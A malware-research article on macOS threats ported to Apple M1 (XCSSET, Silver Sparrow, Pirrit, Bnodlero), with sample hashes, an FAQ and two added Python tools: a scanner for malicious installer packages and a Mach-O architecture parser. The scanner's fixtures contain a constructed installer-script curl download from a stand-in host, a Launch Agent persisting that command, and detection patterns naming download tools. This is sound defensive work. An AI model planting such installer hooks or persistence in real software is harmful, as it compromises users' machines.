Introduction

A short while ago, Apple released Mac computers built around its new Apple M1 chip. The release was a milestone for Apple hardware. As the platform spreads, however, we also observe growing interest in it from malware authors, which inevitably leads to new malware samples compiled for Apple Silicon. In this article, we take a look at threats for Macs with the Apple M1 chip on board. We also prepared a short F.A.Q. at the end of the article for those who want to understand the security risks of M1 malware better. Let's dive in.

XCSSET malware

Last year, a threat called XCSSET was discovered for the first time. It mainly targets Mac developers and uses an unusual distribution method: injecting a malicious payload into Xcode IDE projects on the victim's Mac. The payload is executed when the project is built in Xcode. XCSSET modules have numerous capabilities, such as:

- Reading and dumping Safari cookies
- Injecting malicious JavaScript code into various websites
- Stealing user files and data from applications such as Notes, WeChat, Skype, Telegram, etc.
- Encrypting user files

All these features, combined with a high degree of stealth and an unusual distribution method, make XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found that some of them also contain code compiled specifically for the new Apple Silicon chips. For instance, a sample with the MD5 hash 914e49921c19fffd7443deee6ee161a4 contains two architectures: x86_64 and ARM64.

The first corresponds to previous-generation, Intel-based Mac computers, while the second is compiled for the ARM64 architecture, which means it can run natively on computers with the new Apple M1 chip. According to VirusTotal, this sample was first uploaded on 2021-02-24 21:06:05, and the original research report contained neither this hash nor a module named "metald", the name of the executable file. With this information in hand, we can assume that the XCSSET campaign is probably still ongoing. This also suggests that more and more malware authors are actively recompiling their samples so they can run natively on the new Apple Silicon Macs.

Silver Sparrow threat

XCSSET is not the only family that has adapted to run natively on Apple Silicon. According to a Red Canary report, a new threat called Silver Sparrow has been identified. It introduces a new way for malware authors to abuse the standard macOS installer package (.pkg) format: instead of placing a malicious payload in the preinstall or postinstall scripts, the authors hid it in the package's Distribution XML file.

This payload uses the installer's JavaScript API to run shell commands that download a JSON configuration file.

Downloading of JSON config

After successfully downloading the configuration file, the sample extracts a URL from its downloadURL field for the next download.

Downloading and executing a payload

A Launch Agent is also created so that the malicious sample is executed persistently.

Malware persistence
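The chain described above, as an added example rather than code from the original article or from the Silver Sparrow sample: a Python scanner that flags a Distribution XML whose installer JavaScript calls system.run() with a shell, pulls the next-stage URL out of a fetched JSON config by its downloadURL field, and flags a Launch Agent that persists a shell one-liner. The XML, JSON and plist inputs are constructed for the demo; the domains, the Launch Agent label and every config field other than downloadURL are assumptions, not indicators from the real campaign.

```python
import json
import plistlib
import re
import xml.etree.ElementTree as ET

# Constructed Distribution XML in the shape of a .pkg "distribution" file. The installer
# evaluates the JavaScript in <installation-check> early, before the package payload is
# written, so a shell command placed there runs without any preinstall/postinstall script.
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
    <title>Example Updater</title>
    <options customize="never" allow-external-scripts="yes"/>
    <installation-check script="installationCheck()"/>
    <script><![CDATA[
function installationCheck() {
    system.run('/bin/sh', '-c', 'curl -s https://config.example.invalid/version.json -o /tmp/version.json');
    return true;
}
]]></script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default" title="Example"/>
</installer-gui-script>
"""

# Constructed JSON config of the kind the installer script fetches; only the
# "downloadURL" field name comes from the article, the rest is made up.
SAMPLE_CONFIG = '{"version": "1.0", "downloadURL": "https://updates.example.invalid/agent.pkg"}'

# Constructed Launch Agent plist (hypothetical label): a shell one-liner run at login
# and every hour.
SAMPLE_LAUNCH_AGENT = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/sh", "-c",
                         "curl -s https://config.example.invalid/version.json -o /tmp/version.json"],
    "RunAtLoad": True,
    "StartInterval": 3600,
})

SHELL_RUN_RE = re.compile(r"system\.run\s*\(\s*['\"](/bin/(?:ba|z)?sh|/usr/bin/env)['\"]")
NET_TOOL_RE = re.compile(r"\b(curl|wget|nscurl|osascript|launchctl)\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def scan_distribution(xml_text):
    """Flag installer JavaScript in a Distribution XML that shells out or talks to the network."""
    root = ET.fromstring(xml_text)
    findings = []
    options = root.find("options")
    if options is not None and options.get("allow-external-scripts") == "yes":
        findings.append("options: allow-external-scripts=yes lets installer JS call system.run()")
    for script in root.iter("script"):
        body = script.text or ""          # CDATA content is returned as plain text
        if SHELL_RUN_RE.search(body):
            findings.append("script: system.run() spawns a shell")
        tools = sorted(set(NET_TOOL_RE.findall(body)))
        if tools:
            findings.append("script: invokes " + ", ".join(tools))
        findings.extend("script: contacts " + url for url in URL_RE.findall(body))
    return findings


def next_stage_url(config_text):
    """Pull the next download location from the fetched JSON, as the sample does with downloadURL."""
    return json.loads(config_text).get("downloadURL")


def scan_launch_agent(plist_bytes):
    """Flag a LaunchAgent that persists a shell one-liner with network tooling."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    cmdline = " ".join(args)
    findings = []
    if plist.get("RunAtLoad"):
        findings.append("RunAtLoad: starts at every login")
    if plist.get("StartInterval"):
        findings.append("StartInterval: re-runs every %ss" % plist["StartInterval"])
    if args[0] in ("/bin/sh", "/bin/bash", "/bin/zsh"):
        findings.append("ProgramArguments: shell one-liner instead of a signed binary")
    tools = sorted(set(NET_TOOL_RE.findall(cmdline)))
    if tools:
        findings.append("ProgramArguments: invokes " + ", ".join(tools))
    findings.extend("ProgramArguments: contacts " + url for url in URL_RE.findall(cmdline))
    return findings


if __name__ == "__main__":
    for name, result in (("distribution", scan_distribution(SAMPLE_DISTRIBUTION)),
                         ("launch agent", scan_launch_agent(SAMPLE_LAUNCH_AGENT))):
        print(name + ":")
        for finding in result:
            print("  -", finding)
    print("next stage:", next_stage_url(SAMPLE_CONFIG))
```

To use it on a real package, expand it with `pkgutil --expand` and feed the extracted Distribution file to scan_distribution(); the Launch Agent check reads any plist under ~/Library/LaunchAgents or /Library/LaunchAgents. The heuristics are deliberately narrow (a shell spawned from installer JavaScript plus a download tool or URL) so that legitimate installers, which normally only query system properties from JavaScript, produce no findings.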

This JavaScript payload can be executed regardless of chip architecture, but the package file with the MD5 hash fdd6fb2b1dfe07b0e57d4cbfef9c8149 contains a "fat" Mach-O with two supported architectures (ARM64 and x86_64), as compared to the older bundle with the MD5 hash 30c9bc7d40454e501c358f77449071aa. This means the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.
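A way to check which slices a sample carries, as an added example rather than code from the article or from any of the samples it discusses: a Python parser for the Mach-O fat header that lists the architectures in a universal binary and also accepts a thin one, with a helper that states how the result would run on an Apple M1 Mac (natively, under Rosetta 2, or not at all). The same check covers the XCSSET "metald" module above and the Silver Sparrow package. The sample bytes are constructed headers, not the real samples; the magic values and CPU type constants are Apple's, but the slice layout of the demo file is an assumption.

```python
import struct
import sys

# Constants from Apple's <mach-o/fat.h>, <mach-o/loader.h> and <mach/machine.h>.
FAT_MAGIC = 0xCAFEBABE       # universal ("fat") header, always stored big-endian
FAT_MAGIC_64 = 0xCAFEBABF    # fat header with 64-bit fat_arch_64 entries
MH_MAGIC = 0xFEEDFACE        # thin 32-bit Mach-O header
MH_MAGIC_64 = 0xFEEDFACF     # thin 64-bit Mach-O header
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86 = 7
CPU_TYPE_ARM = 12
CPU_TYPE_X86_64 = CPU_TYPE_X86 | CPU_ARCH_ABI64   # 0x01000007
CPU_TYPE_ARM64 = CPU_TYPE_ARM | CPU_ARCH_ABI64    # 0x0100000C
CPU_NAMES = {CPU_TYPE_X86: "i386", CPU_TYPE_X86_64: "x86_64",
             CPU_TYPE_ARM: "arm", CPU_TYPE_ARM64: "arm64"}


def cpu_name(cputype):
    return CPU_NAMES.get(cputype, "unknown(0x%08x)" % (cputype & 0xFFFFFFFF))


def mach_o_architectures(data):
    """Return the architecture names found in a Mach-O blob: one per fat slice,
    or exactly one for a thin binary. Raises ValueError for anything else."""
    if len(data) < 32:
        raise ValueError("too short to be a Mach-O")
    magic_be, = struct.unpack_from(">I", data, 0)
    if magic_be in (FAT_MAGIC, FAT_MAGIC_64):
        nfat_arch, = struct.unpack_from(">I", data, 4)
        # fat_arch:    cputype, cpusubtype, offset, size, align         (all uint32)
        # fat_arch_64: cputype, cpusubtype, offset, size (uint64), align, reserved
        fmt = ">iIIII" if magic_be == FAT_MAGIC else ">iIQQII"
        entry_size = struct.calcsize(fmt)
        if 8 + nfat_arch * entry_size > len(data):
            raise ValueError("fat_arch table runs past end of file")
        archs = []
        for i in range(nfat_arch):
            cputype, _subtype, offset, size = struct.unpack_from(fmt, data, 8 + i * entry_size)[:4]
            # A slice pointing outside the file, or one that does not start with a
            # Mach-O header, is malformed (or evasive); refuse it rather than trust the table.
            if size < 4 or offset + size > len(data):
                raise ValueError("slice %d (%s) lies outside the file" % (i, cpu_name(cputype)))
            slice_magic, = struct.unpack_from("<I", data, offset)
            if slice_magic not in (MH_MAGIC, MH_MAGIC_64):
                raise ValueError("slice %d (%s) has no Mach-O header" % (i, cpu_name(cputype)))
            archs.append(cpu_name(cputype))
        return archs
    magic_le, = struct.unpack_from("<I", data, 0)
    if magic_le in (MH_MAGIC, MH_MAGIC_64):
        cputype, = struct.unpack_from("<i", data, 4)   # mach_header.cputype follows the magic
        return [cpu_name(cputype)]
    raise ValueError("not a Mach-O file")


def m1_execution_mode(archs):
    """How a binary with these slices runs on an Apple Silicon Mac: natively, only
    through Rosetta 2 translation, or not at all."""
    if "arm64" in archs:
        return "native"
    if "x86_64" in archs:
        return "rosetta2"
    return "none"


def _thin_header(cputype, cpusubtype):
    """Constructed 32-byte mach_header_64 (MH_EXECUTE, zero load commands): a stand-in
    for a real slice, not an executable."""
    return struct.pack("<IiIIIIII", MH_MAGIC_64, cputype, cpusubtype, 2, 0, 0, 0, 0)


def build_fat(slices, slice_align=0x100):
    """Constructed universal binary: a fat header followed by the given thin headers,
    each at a multiple of slice_align (the real linker page-aligns slices; this is a demo)."""
    table = struct.pack(">II", FAT_MAGIC, len(slices))
    body = b""
    for i, (cputype, cpusubtype, blob) in enumerate(slices):
        offset = slice_align * (i + 1)
        table += struct.pack(">iIIII", cputype, cpusubtype, offset, len(blob), 8)
        body += blob.ljust(slice_align, b"\0")
    return table.ljust(slice_align, b"\0") + body


# Sample input shaped like the two-slice binaries discussed above: x86_64 plus arm64
# (CPU_SUBTYPE_X86_64_ALL = 3, CPU_SUBTYPE_ARM64_ALL = 0). Constructed, not a real sample.
SAMPLE_FAT = build_fat([(CPU_TYPE_X86_64, 3, _thin_header(CPU_TYPE_X86_64, 3)),
                        (CPU_TYPE_ARM64, 0, _thin_header(CPU_TYPE_ARM64, 0))])
SAMPLE_INTEL_ONLY = _thin_header(CPU_TYPE_X86_64, 3)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_FAT
    archs = mach_o_architectures(blob)
    print("architectures:", ", ".join(archs), "| on Apple M1:", m1_execution_mode(archs))
```

Run it with a path to a Mach-O to get the same answer `file` or `lipo -archs` would give, without trusting a possibly hostile sample to a native tool. The slice bounds check matters in practice: a fat header whose table points past the end of the file is a cheap way to make naive parsers read garbage or crash.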

Adware threats for the new platform

It is not only malware samples that can be launched on Apple Silicon. The well-known Mac malware researcher Patrick Wardle recently published a post covering the Pirrit adware. Although it is an old and well-known adware family, it is still actively updated by its authors, and new samples are encountered in the wild quite often.

These updates include:

- Anti-debug techniques such as calling the ptrace syscall with the PT_DENY_ATTACH flag
- Control flow obfuscation
- Dynamic imports resolved through dlsym calls, to hinder static analysis
- Virtual machine detection as an anti-analysis measure

Control flow obfuscation; dynamic symbol resolution with dlsym

Besides these improvements in the regular Intel x86_64 samples, new ARM64 samples were introduced. These are compiled specifically for the Apple Silicon M1 chip, but the consequences of running them are roughly the same: launching Pirrit adware results in pop-ups, banners and various annoying advertisements displayed on the victim's Mac.

Pirrit is not the only adware family to have started supporting the Apple Silicon platform recently. For example, we also observed an ARM64 Bnodlero adware sample (MD5 82e02c1ca8dfb4c60ee98dc877ce77c5), which runs a bash downloader script through the system() function.

Bash downloader executed by the Bnodlero sample

Frequently Asked Questions

What is so special about M1 threats?

Well, frankly speaking, there is not much special about them. The only thing that distinguishes the new Apple M1 threats from previous ones targeting Intel-based Mac computers is the processor architecture for which the executable is compiled. To get their applications to run natively on Apple Silicon, software developers have to recompile their code into executables that the M1 chip can run. The same is true for malware authors.

Is the Apple M1 chip less secure than Intel ones?

No, it is just a matter of which platforms the malware executables support.

Are Intel-based Macs affected by M1 threats?

Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be executed natively on the Intel x86_64 architecture. On the other hand, malicious samples are often distributed as so-called "fat" Mach-O binaries, which usually contain the same code compiled for several architectures. Running such a "fat" executable launches the malicious code that matches your platform's architecture. The Pirrit and Bnodlero samples are good examples of this approach.

Can threats for Intel-based Macs run on Apple M1?

Yes, they can. Thanks to Rosetta 2, the newly released Mac computers with Apple M1 can also run malicious code compiled exclusively for the Intel x86_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to its own chips.

Is there an upward trend in M1 malware?

Yes, there certainly is, and it is entirely to be expected. As soon as a platform becomes popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.

Conclusion

With the new M1 chip, Apple has certainly pushed the performance and energy-saving limits of Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture.

We have observed various attempts to port executables, not just among typical adware such as the Pirrit and Bnodlero samples, but also among malicious bundles such as the Silver Sparrow threat and the downloadable XCSSET modules. This will certainly encourage other malware authors to begin adapting their code to run on Apple M1 chips.

Read more: securelist.com